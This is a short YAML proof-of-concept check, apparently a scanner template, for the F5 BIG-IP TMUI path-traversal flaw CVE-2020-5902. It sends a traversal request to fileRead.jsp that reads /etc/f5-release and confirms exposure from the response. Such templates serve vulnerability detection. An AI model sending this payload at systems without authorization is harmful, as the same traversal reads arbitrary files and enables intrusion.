name: poc-yaml-f5-tmui-cve-2020-5902-rce
rules:
  - method: POST
    path: >-
      /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: fileName=%2Fetc%2Ff5-release
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(b"BIG-IP release")
detail:
  author: Jing Ling
  links:
    - https://support.f5.com/csp/article/K52145254
    - https://github.com/rapid7/metasploit-framework/pull/13807/files